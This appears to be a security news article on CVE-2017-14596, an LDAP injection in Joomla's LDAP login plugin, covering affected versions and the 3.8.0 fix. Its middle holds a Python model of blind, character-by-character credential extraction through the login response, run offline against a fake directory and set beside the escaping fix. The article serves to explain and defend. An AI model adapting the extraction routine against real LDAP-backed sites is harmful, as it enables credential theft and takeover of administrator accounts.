Joomla is one of the leading open-source content management systems (CMS). For roughly eight years it carried a security bug in its LDAP authentication plugin. The bug is dangerous because it can be used to steal account credentials, which in turn can lead to the compromise of the affected websites.
Recently, the Joomla project published a security advisory with the details of the flaw. The advisory classifies the exploit type as information disclosure, caused by inadequate escaping in the LDAP authentication plugin.
What Is Information Disclosure?
Information disclosure is the leakage of confidential information, such as the username and password of a particular user. For any website user, these two pieces of information are the most sensitive.
A bug of this kind reflects poorly on such a widely deployed CMS. Joomla rated the bug as medium severity; the researchers at RIPS Technologies who reported it, on the contrary, rated the problem as critical.
What Are The Affected Installs And Solutions?
According to the security announcement, the affected installs are Joomla versions 1.5.0 through 3.7.5. Any site still running one of these outdated versions is exposed. The fix stated in the announcement is to upgrade the CMS to version 3.8.0.
LDAP stands for Lightweight Directory Access Protocol. Joomla uses it, through its LDAP authentication plugin, to look up and authenticate users against a directory server over TCP/IP. This plugin ships with the CMS core.
The Joomla team, in one of its blog posts, described the vulnerability as an LDAP injection in the LDAP authentication (login) plugin: the username submitted in the login form is placed into the directory search filter without escaping. An attacker can use a blind injection technique, submitting crafted usernames and observing the login response, to extract credentials from the directory and thereby take control of sites running the older versions of the CMS.
The Flaw CVE-2017-14596
The flaw is listed in the NVD (National Vulnerability Database) as CVE-2017-14596. The entry describes the same problem mentioned above: inadequate escaping in the LDAP authentication plugin lets an attacker extract credentials from the older versions.
About The Attackers
Attackers can hijack the super user's password to get access to the administrator control panel of the Joomla CMS. No privileges are needed to exploit the bug: any unauthenticated visitor who can reach the login form can attempt it. The attack only applies to sites that have enabled the LDAP authentication plugin, which is disabled by default, but on such sites the extracted credentials give the attacker total control over the Joomla installation.
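The blind injection described above and the unauthenticated credential extraction it enables, as an added example that is not code from this page or from Joomla: a Python model of a login plugin that splices the submitted username into a configurable search filter (the `[search]` placeholder is the convention the Joomla plugin uses for its search string; the template, attribute names, directory contents and the login oracle here are constructed assumptions), the RFC 4515 escaping that closes the hole, and a small filter evaluator standing in for the LDAP server so the whole thing runs offline.

```python
"""Model of the LDAP filter injection behind CVE-2017-14596.

Constructed example, not Joomla's plugin code. A login plugin substitutes the
submitted username into a search template ("[search]") without escaping; the
escaped form is shown beside it, and a blind, character-by-character
extraction is run against both using the login response as the oracle.
"""
import re
from typing import Callable

# Constructed in-memory "directory" standing in for the LDAP server.
DIRECTORY = [
    {"uid": "admin", "userPassword": "s3cr3t!", "objectClass": "person"},
    {"uid": "alice", "userPassword": "hunter2", "objectClass": "person"},
]

# Assumed plugin setting: the operator-configured search template.
SEARCH_TEMPLATE = "(&(uid=[search])(objectClass=person))"


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping: each metacharacter becomes a backslash and two hex digits."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value)


def build_filter_unsafe(username: str) -> str:
    """The flawed pattern: raw user input spliced into the filter."""
    return SEARCH_TEMPLATE.replace("[search]", username)


def build_filter_safe(username: str) -> str:
    """The hardened pattern: the input is escaped so it can only ever be a value."""
    return SEARCH_TEMPLATE.replace("[search]", escape_filter_value(username))


def _parse(s: str, i: int):
    """Recursive-descent parser for the filter subset used here:
    (&...), (|...), (!...) and (attr=value) with '*' wildcards and \\xx escapes."""
    if s[i] != "(":
        raise ValueError("expected '(' at offset %d" % i)
    i += 1
    if s[i] in "&|!":
        op, children, i = s[i], [], i + 1
        while s[i] == "(":
            node, i = _parse(s, i)
            children.append(node)
        if s[i] != ")":
            raise ValueError("expected ')' at offset %d" % i)
        return (op, children), i + 1
    j = s.index(")", i)
    attr, _, value = s[i:j].partition("=")
    return ("=", attr, value), j + 1


def _value_pattern(value: str) -> "re.Pattern[str]":
    """Assertion value to regex: '*' is a wildcard, \\xx is a literal character."""
    parts = []
    for segment in value.split("*"):
        literal = re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), segment)
        parts.append(re.escape(literal))
    return re.compile("^" + ".*".join(parts) + "$", re.DOTALL)


def _match(node, entry: dict) -> bool:
    if node[0] == "=":
        _, attr, value = node
        return attr in entry and _value_pattern(value).match(entry[attr]) is not None
    op, children = node
    if op == "&":
        return all(_match(c, entry) for c in children)
    if op == "|":
        return any(_match(c, entry) for c in children)
    return not _match(children[0], entry)


def search(filter_str: str) -> list:
    """Evaluate a filter against DIRECTORY; malformed filters raise, like a server error."""
    node, end = _parse(filter_str, 0)
    if end != len(filter_str):
        raise ValueError("trailing data after filter: %r" % filter_str[end:])
    return [e for e in DIRECTORY if _match(node, e)]


def login_oracle(build: Callable[[str], str], username: str) -> bool:
    """The side channel: did the plugin's search for this username match an entry?
    Models the differing login responses an attacker observes."""
    try:
        return len(search(build(username))) > 0
    except (ValueError, IndexError):
        return False


CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789!"  # constructed; widen for real targets


def extract_attribute(build: Callable[[str], str], uid: str, attr: str,
                      charset: str = CHARSET, max_len: int = 32) -> str:
    """Blind extraction: close the uid assertion and append a prefix-wildcard
    assertion on `attr`, one character at a time, with login_oracle as the bit."""
    known = ""
    for _ in range(max_len):
        # Exact probe (no wildcard): the full value has been recovered.
        if known and login_oracle(build, "%s)(%s=%s" % (uid, attr, escape_filter_value(known))):
            return known
        for ch in charset:
            candidate = known + ch
            if login_oracle(build, "%s)(%s=%s*" % (uid, attr, escape_filter_value(candidate))):
                known = candidate
                break
        else:
            return known  # no character extends the prefix: stop with what we have
    return known


if __name__ == "__main__":
    print(build_filter_unsafe("admin)(userPassword=s*"))
    print(build_filter_safe("admin)(userPassword=s*"))
    print("unsafe:", repr(extract_attribute(build_filter_unsafe, "admin", "userPassword")))
    print("safe:  ", repr(extract_attribute(build_filter_safe, "admin", "userPassword")))
```

Run against the unescaped builder, the probes recover the super user's password one character at a time; against the escaped builder every probe becomes a literal uid lookup that matches nothing, while a normal login for `admin` still works. Real directories rarely allow a search filter to test `userPassword`, but the same oracle extracts any attribute the plugin's bind account can read, and the plugin-side fix is the same in every case: escape the value with a library routine before it touches the filter.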
Joomla And Server Compromise
As one of the leading open-source CMS applications, Joomla receives a great deal of security-focused code review from the community. According to RIPS, even with that scrutiny, a single missed security vulnerability among some 50,000 lines of code is enough to cause a server compromise.
About The Fixes
The Joomla team fixed the eight-year-old bug in version 3.8.0 of the CMS. The update is essential, since every earlier version remains vulnerable.
After this update the plugin escapes the submitted username before building the directory search, and the Joomla CMS is secure against this attack.